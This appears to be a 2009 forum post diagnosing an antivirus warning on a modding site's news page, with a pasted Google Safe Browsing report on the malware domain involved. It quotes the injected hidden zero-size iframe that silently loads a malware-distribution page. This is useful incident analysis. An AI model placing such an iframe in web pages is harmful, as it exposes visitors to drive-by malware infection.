Avast! for home reports something as well.
File name: http://freespacemods.net/news.php\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 090912-0, 12.09.2009Considering the Google's information, I'd say the problem lies here:
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td></tr></table><table style='width:100%' cellspacing='3'><tr><td style='width:20%;'></td><td style='width:60%;'><img src='/e107_themes/e107v4a/images/blank.gif' width='1' height='1' alt='' /></td><td style='width:20%;'></td></tr><tr><td style='width:20%; vertical-align: top;'>http://reycross.com/lib/index.php triggers the same anti-virus warning and Google reports the following of the site:
Safe Browsing
Diagnostic page for reycross.com
What is the current listing status for reycross.com?
Site is listed as suspicious - visiting this website may harm your computer.
What happened when Google visited this site?
Of the 9 pages that we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2009-09-12, and the last time that suspicious content was found on this site was on 2009-09-12.
Malicious software includes 280 trojan(s), 48 exploit(s), 2 scripting exploit(s).
This site was hosted on 5 network(s) including AS20495 (WEDARE), AS49314 (NEVAL), AS48974 (MFOREX).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, reycross.com appeared to function as an intermediary for the infection of 171 site(s) including zerodefectselling.com/, egitimbirsen.org.tr/, uvegateatro.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 387 domain(s), including pokeyplay.com/, egitimbirsen.org.tr/, jag-team.de/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
* Return to the previous page.
* If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.
My conclusion:
CALL GOOGLE AND TELL THEM TO GET THIS OUT OF THEIR ADS.
EDIT: The issue has been reported, but it remains to be seen how fast Google reacts if at all.
EDIT2: In further inspection, it seems it isn't in fact the google ads; the script ends before the offending iframe entry on the news.php starts. Now I feel like a tool.
